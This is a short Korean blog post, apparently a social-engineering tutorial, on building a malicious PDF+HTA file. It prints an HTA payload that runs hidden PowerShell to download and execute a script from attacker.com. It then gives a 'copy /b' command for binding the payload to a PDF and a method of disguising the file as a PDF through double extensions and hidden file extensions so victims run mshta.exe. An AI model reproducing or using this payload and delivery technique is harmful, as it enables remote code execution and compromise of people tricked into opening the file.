사회공학 - PDF + HTA 악성 파일

Janger 2025. 5. 6. 19:46

728x90

payload.hta

<html>
  <head>
    <script>
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')");
    </script>
  </head>
</html>

/copy 명령어로 병합 (Windows CMD)
Windows의 copy /b 명령어를 사용해 이진(Binary) 방식으로 파일 결합

copy /b doc.pdf + payload.hta final.pdf

실행 유도 방식

확장자 숨김 + Windows 실행 우선순위를 이용
파일 이름을 예: document.pdf.hta 또는 document.pdf[space].hta로 만들고
확장자 숨기기를 통해 사용자 눈에는 .pdf처럼 보임
사용자가 클릭하면 mshta.exe가 실행됨

728x90